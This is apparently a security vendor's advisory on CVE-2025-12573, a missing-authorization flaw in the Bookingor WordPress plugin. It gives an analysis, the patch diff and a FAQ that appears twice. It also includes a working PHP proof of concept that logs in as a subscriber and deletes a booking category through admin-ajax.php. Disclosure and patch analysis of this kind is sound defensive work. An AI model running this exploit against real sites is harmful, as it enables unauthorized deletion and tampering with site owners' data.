What is CVE-2025-12573?

CVE-2025-12573 is a medium severity vulnerability in the Bookingor plugin for WordPress, affecting versions up to and including 1.0.12. It allows authenticated users with subscriber-level access or higher to perform unauthorized actions due to missing capability checks on certain AJAX functions.

How does the vulnerability work?

The vulnerability arises from the absence of capability checks and nonce verification in several AJAX handler functions. Attackers can exploit this by sending crafted POST requests to the admin-ajax.php endpoint, allowing them to perform actions like deleting categories or modifying settings without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the Bookingor plugin version 1.0.12 or earlier is affected. Users with subscriber-level access or higher can exploit this vulnerability, potentially leading to unauthorized administrative actions.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Bookingor plugin installed. If the version is 1.0.12 or earlier, your site is at risk. Additionally, review your site’s access logs for any unauthorized actions performed by low-privileged users.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 4.3, which is classified as medium severity. This indicates that while the vulnerability does not allow for complete system takeover, it can still lead to significant unauthorized actions that may disrupt site operations.

How can I fix this vulnerability?

To mitigate this vulnerability, update the Bookingor plugin to version 1.0.13 or later, which includes the necessary security patches. Ensure that your site is regularly updated to protect against known vulnerabilities.

What are nonce checks and why are they important?

Nonce checks are security tokens that help verify the authenticity of requests made to the server. They prevent CSRF attacks by ensuring that the request comes from a legitimate source. In this vulnerability, the lack of nonce verification allows unauthorized actions.

What are capability checks and how do they work?

Capability checks are functions in WordPress that determine whether a user has the necessary permissions to perform certain actions. In this case, the absence of checks like current_user_can() allowed unauthorized users to execute administrative functions.

What is the practical risk of this vulnerability?

The practical risk includes the potential for low-privileged users to delete or modify critical data, such as booking categories, services, and customer information. This could disrupt the booking system and lead to data integrity issues.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can authenticate as a low-privileged user and send a crafted request to perform unauthorized actions. It shows the steps involved in exploiting the vulnerability, highlighting the lack of necessary checks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Bookingor plugin until a patch can be applied. Additionally, review user permissions and limit access to sensitive functions as a temporary measure.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, WordPress security forums, and the Atomic Edge research publication on CVE-2025-12573. These resources provide detailed analysis and guidance on addressing the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-12573: Bookingor <= 1.0.12 – Missing Authorization (bookingor)

CVE ID CVE-2025-12573

Plugin bookingor

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 1.0.12

Patched Version 1.0.13

Disclosed January 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12573:
The Bookingor WordPress plugin, versions up to and including 1.0.12, contains a missing authorization vulnerability. This flaw allows authenticated attackers with subscriber-level access or higher to perform administrative actions without proper permission checks. The vulnerability has a CVSS score of 4.3 (Medium severity).

Atomic Edge research identified the root cause as missing capability checks and nonce verification across multiple AJAX handler functions. The vulnerable code resides in several control files within the `bookingor/admin/include/` directory. Functions such as `delete_category` in `category-control.php` (line 115), `update_location` in `location-control.php` (line 137), and `updates_design_templates` in `templates-control.php` (line 13) process user requests after checking only for the presence of an `action` parameter. These functions lack any verification of the user’s capability to perform the action (e.g., `current_user_can(‘manage_options’)`) and do not validate a WordPress nonce, making them accessible to any authenticated user.

Exploitation requires an attacker to have a valid WordPress account with at least subscriber-level privileges. The attacker sends a crafted POST request to `/wp-admin/admin-ajax.php` with an `action` parameter corresponding to a vulnerable function. For example, to delete a category, the attacker would send a request with `action` set to `delete_category` and include the `id` parameter specifying the target category. The request does not require a valid nonce. The attacker can similarly target other administrative functions like adding services, updating staff details, or modifying template settings by using the appropriate `action` parameter and corresponding POST data.

The patch addresses the vulnerability by implementing two security controls. First, it adds a nonce creation step in `class-bookingor-admin.php` (line 243) via `wp_create_nonce(‘bookingor_ajax_nonce’)` and localizes it for client-side scripts. Second, it adds nonce verification and capability checks at the beginning of each vulnerable function. For instance, in `category-control.php`, the `delete_category` function now checks `if (!wp_verify_nonce(…))` and `if (!current_user_can(‘manage_options’))` (lines 133-147) before processing the request. The patch also adds custom capabilities (`bp_delete_category`, etc.) to the administrator role in `class-bookingor-activator.php` (lines 37-43), though the primary fix relies on the standard `manage_options` check.

Successful exploitation allows an attacker with low-privileged access to perform unauthorized administrative actions. Impact includes the deletion or modification of booking categories, services, staff profiles, customer data, locations, and notification templates. An attacker could disrupt the booking system’s operation, alter pricing or availability, or delete critical data. The vulnerability does not directly lead to remote code execution or site takeover, but it enables significant data manipulation and business logic disruption.

Differential between vulnerable and patched code

Code Diff

--- a/bookingor/admin/class-bookingor-admin.php
+++ b/bookingor/admin/class-bookingor-admin.php
@@ -242,7 +242,8 @@
 		wp_enqueue_script($this->plugin_name . '-full-calendar-list', plugins_url('js/full-calender/packages/list/index.global.js', __FILE__), array('jquery'), '6.10.0', true);
 		wp_enqueue_script($this->plugin_name . '-full-calendar-time-grid', plugins_url('js/full-calender/packages/timegrid/index.global.js', __FILE__), array('jquery'), '6.10.0', true);
 		wp_enqueue_script($this->plugin_name . '-full-calendar-interaction', plugins_url('js/full-calender/packages/interaction/index.global.js', __FILE__), array('jquery'), '6.10.0', true);
-		wp_localize_script('jquery', 'TCN_BIND', array('GET_URL' => admin_url('admin-ajax.php')));
+		$ajax_nonce = wp_create_nonce('bookingor_ajax_nonce');
+		wp_localize_script('jquery', 'TCN_BIND', array('GET_URL' => admin_url('admin-ajax.php'), 'nonce' => $ajax_nonce));
 		// tostr
 		wp_enqueue_script($this->plugin_name . '-toastr', plugin_dir_url(dirname(__FILE__)) . 'includes/toastr/js/jquery.toast.js', array(), '2.1.4', true);
 		// datepicker
--- a/bookingor/admin/include/booking/booking-control.php
+++ b/bookingor/admin/include/booking/booking-control.php
@@ -110,6 +110,14 @@
         // phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
         if (isset($_REQUEST['action'])) {
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
             $get_book_id = sanitize_text_field(wp_unslash($_REQUEST['booking_stats_id'] ?? ""));
             $get_book_status = sanitize_text_field(wp_unslash($_POST['book_status'] ?? ""));
             $bookings = $wpdb->get_row(
--- a/bookingor/admin/include/category/category-control.php
+++ b/bookingor/admin/include/category/category-control.php
@@ -38,7 +38,25 @@
 		// phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
 		if (isset($_REQUEST["id"])) {
-			$id = stripslashes(filter_var($_REQUEST["id"], FILTER_SANITIZE_NUMBER_INT)); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
+			if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			$id = stripslashes(filter_var($_REQUEST["id"], FILTER_SANITIZE_NUMBER_INT)); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.
+
+
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}

 			$get_category_in_booking = $wpdb->get_results(
 				$wpdb->prepare(
@@ -61,8 +79,8 @@
 					'status' => htmlspecialchars('error'),
 					'message' => htmlspecialchars('Category is already in use.')
 				];
-				echo wp_json_encode($response);;
-				exit;
+				echo wp_json_encode($response);
+				die();
 			}
 		}
 	}
@@ -96,8 +114,8 @@
 				'status' => htmlspecialchars('success'),
 				'message' => htmlspecialchars("Category Updated successfully")
 			];
-			echo wp_json_encode($response);;
-			exit;
+			echo wp_json_encode($response);
+			die();
 		}
 	}
 	/**
@@ -115,6 +133,22 @@
 		global $wpdb;
 		$category = $wpdb->prefix . self::$dp_prefix . 'categories';
 		if (isset($_REQUEST['action'])) {
+		if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$category_name   = sanitize_text_field(wp_unslash($_POST['tcn_category_name'] ?? ""));
 			$category_icon   = absint(wp_unslash($_POST['tcn_category_icon_id'] ?? ""));
 			$category_status = sanitize_text_field(wp_unslash($_POST['tcn_category_status'] ?? "" ));
@@ -139,8 +173,8 @@
 				'status' => htmlspecialchars('success'),
 				'message' => htmlspecialchars('Category Added successfully.')
 			];
-			echo wp_json_encode($response);;
-			exit;
+			echo wp_json_encode($response);
+			die();
 		}
 	}
 	/**
@@ -193,7 +227,7 @@
 				)
 			);

-		echo wp_json_encode($response);;
+		echo wp_json_encode($response);
 		die;
 	}
 }
--- a/bookingor/admin/include/customer/customer-control.php
+++ b/bookingor/admin/include/customer/customer-control.php
@@ -56,6 +56,22 @@
 		// phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
 		$id = stripslashes(filter_var($_REQUEST["id"] ?? "", FILTER_SANITIZE_NUMBER_INT)); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash

+					if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 		$get_customer_in_booking = $wpdb->get_results(
 			$wpdb->prepare(
 				"SELECT book_id, duration_service, start_time, end_time, picked_date_end, picked_date, service_get_price,  paid_amount, payment_method, customer_time_zone, token_code, appoint_status, category_get_id, service_get_id, staff_get_id, location_get_id, updated_at, created_at FROM {$wpdb->prefix}bookingor_booked_appointment  WHERE customer_get_id = %d",
--- a/bookingor/admin/include/location/location-control.php
+++ b/bookingor/admin/include/location/location-control.php
@@ -60,6 +60,22 @@
         // phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
         if (isset($_REQUEST['action'])) {
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             $location_title = sanitize_text_field(wp_unslash($_POST['bookingor_location_title'] ?? ''));
             $location_icon = sanitize_text_field(wp_unslash($_POST['location_icon_id'] ?? ''));
             $location_phone   = sanitize_text_field(wp_unslash($_POST['bp_location_phone_number'] ?? ''));
@@ -137,6 +153,22 @@
         global $wpdb;
         $update_location = $wpdb->prefix . self::$dp_prefix . 'location';
         if (isset($_REQUEST['action'])) {
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             $location_title = sanitize_text_field(wp_unslash($_POST['bookingor_location_title'] ?? ""));
             $location_id   = sanitize_text_field(wp_unslash($_POST['location_id'] ?? ""));
             $location_icon = sanitize_text_field(wp_unslash($_POST['location_icon_id_update'] ?? ""));
--- a/bookingor/admin/include/notification/notification-control.php
+++ b/bookingor/admin/include/notification/notification-control.php
@@ -47,6 +47,23 @@
 		// phpcs:disable WordPress.Security.NonceVerification.Recommended -- Verified elsewhere.
 		// phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
 		if (isset($_REQUEST['action'])) {
+
+						if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$email_get_id = sanitize_text_field(wp_unslash($_POST['email_id'] ?? ""));
 			$email_subject = sanitize_text_field(wp_unslash($_POST['subject'] ?? ""));
 			$email_content = wp_kses_post(wp_unslash($_POST['body'] ?? ""));
--- a/bookingor/admin/include/services/service-control.php
+++ b/bookingor/admin/include/services/service-control.php
@@ -138,6 +138,22 @@
         // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
         $service_get_id = isset($_REQUEST['get_service_id']) ? intval($_REQUEST['get_service_id']) : 0;
         if (isset($_REQUEST['action'])) {
+            if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             // phpcs:disable WordPress.Security.NonceVerification.Missing -- Verified elsewhere.
             $service_name   = sanitize_text_field(wp_unslash($_POST['service_name'] ?? ""));
             $service_icon   = sanitize_text_field(wp_unslash($_POST['service_icon_id'] ?? ""));
@@ -294,6 +310,23 @@


         if (isset($_REQUEST['action'])) {
+
+                        if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             //tab basic
             $service_name   = sanitize_text_field(wp_unslash($_POST['service_name'] ?? ""));
             $service_icon   = sanitize_text_field(wp_unslash($_POST['service_icon_id'] ?? ""));
@@ -432,6 +465,24 @@
         $delete_service = $wpdb->prefix . self::$dp_prefix . 'services';
         $delete_staff_assign_service = $wpdb->prefix . self::$dp_prefix . 'staff_assign_service';
         $id = sanitize_text_field(wp_unslash(isset($_REQUEST["id"]) ? $_REQUEST["id"] : ""));
+
+         if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+        }
+        if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
+
         $wpdb->delete($delete_service, array(
             'service_id' => $id
         ));
--- a/bookingor/admin/include/staff/staff-control.php
+++ b/bookingor/admin/include/staff/staff-control.php
@@ -118,6 +118,23 @@
 		$staff_location_assign = $wpdb->prefix . self::$dp_prefix . 'location_assign_staff';
 		$staff_get_id =  isset($_REQUEST['get_staff_id']) ? intval($_REQUEST['get_staff_id']) : 0;
 		if (isset($_REQUEST['action'])) {
+
+			            if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$staff_first_name = sanitize_text_field(isset($_POST['staff_first_name']) ? $_POST['staff_first_name'] : '');
 			$staff_last_name = sanitize_text_field(isset($_POST['staff_last_name']) ? $_POST['staff_last_name'] : '');
 			$staff_phone = sanitize_text_field(isset($_POST['staff_phone']) ? $_POST['staff_phone'] : '');
@@ -250,6 +267,22 @@
 		$assign_staff_service = $wpdb->prefix . self::$dp_prefix . 'staff_assign_service';
 		$staff_location_assign = $wpdb->prefix . self::$dp_prefix . 'location_assign_staff';
 		if (isset($_REQUEST['action'])) {
+			            if (isset($_POST['nonce'])) {
+                if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+                    $response = [
+                        'status' => htmlspecialchars('error'),
+                        'message' => htmlspecialchars('Nonce verification failed.')
+                    ];
+                }
+            }
+			if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
 			$staff_first_name =  sanitize_text_field($_POST['staff_first_name'] ?? "");
 			$staff_last_name = sanitize_text_field($_POST['staff_last_name'] ?? "");
 			$staff_phone = sanitize_text_field($_POST['staff_phone'] ?? "");
--- a/bookingor/admin/include/templates/templates-control.php
+++ b/bookingor/admin/include/templates/templates-control.php
@@ -13,6 +13,23 @@
     public function updates_design_templates()
     {
         if (isset($_REQUEST['action'])) {
+
+            			if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             if (isset($_REQUEST['editingId']) && sanitize_text_field($_REQUEST['editingId']) === '1') {
                 update_option(self::$name_prefix . '_settings_background_border_active_design_1', sanitize_text_field($_POST['settings_background_border_active_design_1'] . 'px' ?? ''));
                 update_option(self::$name_prefix . '_settings_background_border_color_design_1', sanitize_text_field($_POST['settings_background_border_color_design_1'] ?? ''));
@@ -174,6 +191,22 @@
     public static function bp_settings_get_design_templates_data()
     {
         if (isset($_REQUEST['action'])) {
+            if (isset($_POST['nonce'])) {
+				if (!wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'bookingor_ajax_nonce')) {
+					$response = [
+						'status' => htmlspecialchars('error'),
+						'message' => htmlspecialchars('Nonce verification failed.')
+					];
+				}
+			}
+            if (!current_user_can('manage_options')) {
+				$response = [
+					'status' => htmlspecialchars('error'),
+					'message' => htmlspecialchars('You do not have permission.')
+				];
+				echo wp_json_encode($response);
+				die();
+			}
             //stripe
             $dcimal_point = get_option(self::$name_prefix . '_currency_decimal_point');
             get_option(self::$name_prefix . '_settings_stripe_sandbox');
--- a/bookingor/includes/class-bookingor-activator.php
+++ b/bookingor/includes/class-bookingor-activator.php
@@ -34,7 +34,14 @@
     ob_flush();
     ob_start();

-
+    // Add custom capabilities
+    $role = get_role('administrator');
+    if ($role) {
+      $role->add_cap('bp_delete_category');
+      $role->add_cap('bp_add_category');
+      $role->add_cap('bp_update_category');
+      $role->add_cap('bp_get_category');
+    }

     //category
     global $wpdb;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12573 - Bookingor <= 1.0.12 - Missing Authorization
<?php
// Configuration
$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'subscriber'; // Attacker's low-privilege username
$password = 'password'; // Attacker's password

// Step 1: Authenticate to WordPress and obtain session cookies
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit missing authorization to delete a category
// The 'delete_category' action does not require a nonce or admin capability in vulnerable versions
$post_data = [
    'action' => 'delete_category', // Vulnerable AJAX action
    'id' => '5' // ID of the category to delete
    // No 'nonce' parameter is required for exploitation
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Check response
if (strpos($response, 'success') !== false) {
    echo "[+] Category deletion likely successful.n";
    echo "Response: $responsen";
} else {
    echo "[-] Exploit may have failed or site is patched.n";
    echo "Response: $responsen";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-12573?
Overview of the vulnerability
CVE-2025-12573 is a medium severity vulnerability in the Bookingor plugin for WordPress, affecting versions up to and including 1.0.12. It allows authenticated users with subscriber-level access or higher to perform unauthorized actions due to missing capability checks on certain AJAX functions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the absence of capability checks and nonce verification in several AJAX handler functions. Attackers can exploit this by sending crafted POST requests to the admin-ajax.php endpoint, allowing them to perform actions like deleting categories or modifying settings without proper authorization.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Bookingor plugin version 1.0.12 or earlier is affected. Users with subscriber-level access or higher can exploit this vulnerability, potentially leading to unauthorized administrative actions.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Bookingor plugin installed. If the version is 1.0.12 or earlier, your site is at risk. Additionally, review your site’s access logs for any unauthorized actions performed by low-privileged users.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for this vulnerability is 4.3, which is classified as medium severity. This indicates that while the vulnerability does not allow for complete system takeover, it can still lead to significant unauthorized actions that may disrupt site operations.
How can I fix this vulnerability?
Steps to patch the issue
To mitigate this vulnerability, update the Bookingor plugin to version 1.0.13 or later, which includes the necessary security patches. Ensure that your site is regularly updated to protect against known vulnerabilities.
What are nonce checks and why are they important?
Role of nonces in security
Nonce checks are security tokens that help verify the authenticity of requests made to the server. They prevent CSRF attacks by ensuring that the request comes from a legitimate source. In this vulnerability, the lack of nonce verification allows unauthorized actions.
What are capability checks and how do they work?
Understanding user permissions
Capability checks are functions in WordPress that determine whether a user has the necessary permissions to perform certain actions. In this case, the absence of checks like current_user_can() allowed unauthorized users to execute administrative functions.
What is the practical risk of this vulnerability?
Potential impacts of exploitation
The practical risk includes the potential for low-privileged users to delete or modify critical data, such as booking categories, services, and customer information. This could disrupt the booking system and lead to data integrity issues.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept illustrates how an attacker can authenticate as a low-privileged user and send a crafted request to perform unauthorized actions. It shows the steps involved in exploiting the vulnerability, highlighting the lack of necessary checks.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Bookingor plugin until a patch can be applied. Additionally, review user permissions and limit access to sensitive functions as a temporary measure.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found in the official CVE database, WordPress security forums, and the Atomic Edge research publication on CVE-2025-12573. These resources provide detailed analysis and guidance on addressing the vulnerability.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations